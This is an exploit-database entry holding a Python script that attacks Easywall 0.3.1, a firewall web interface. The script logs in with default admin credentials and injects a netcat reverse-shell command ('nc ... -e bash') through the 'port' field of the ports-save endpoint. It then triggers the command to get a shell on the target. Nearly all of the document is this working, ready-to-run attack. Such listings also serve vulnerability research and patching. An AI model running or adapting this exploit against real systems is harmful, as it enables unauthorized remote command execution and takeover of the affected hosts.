Easywall 0.3.1 - Authenticated Remote Command Execution

EDB-ID:

51856

CVE:

N/A




Platform:

Multiple

Date:

2024-03-03


# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04

import requests, json, urllib3
urllib3.disable_warnings()

def exploit():
    
    # Replace values needed here
    target_host = "192.168.1.25"
    target_port= "12227"
    lhost = "192.168.1.10"
    lport = "9001"
    user = "admin"
    password = "admin"
    
    target = f"https://{target_host}:{target_port}"

    # Authenticate to the app
    print("[+] Attempting login with the provided credentials...")
    login_data = {"username":user, "password":password}
    session = requests.session()
    try:
        login = session.post(f'{target}/login',data=login_data,verify=False)
    except Exception as ex:
        print("[!] There was a problem connecting to the app, error:", ex)
        exit(1)

    if login.status_code != 200:
        print("[!] Login failed.")
        exit(1)
    else:
        print("[+] Login successfull.")    
    
    # Send the payload, the port parameter suffers from a command injection vulnerability
    print("[+] Attempting to send payload.")
    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
    if send_payload.status_code != 200:
        print("[!] Failed to send payload.")
        exit(1)
    else:
        print("[+] Payload sent.")

    # Trigger the execution of the payload
    print("[+] Attempting execution.")
    data = {"step_1":"", "step_2":""}
    execute = session.post(f"{target}/apply-save",data=data, verify=False)
    if execute.status_code != 200:
        print("[!] Attempt to execute failed.")
        exit(1)
    else:
        print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")

exploit()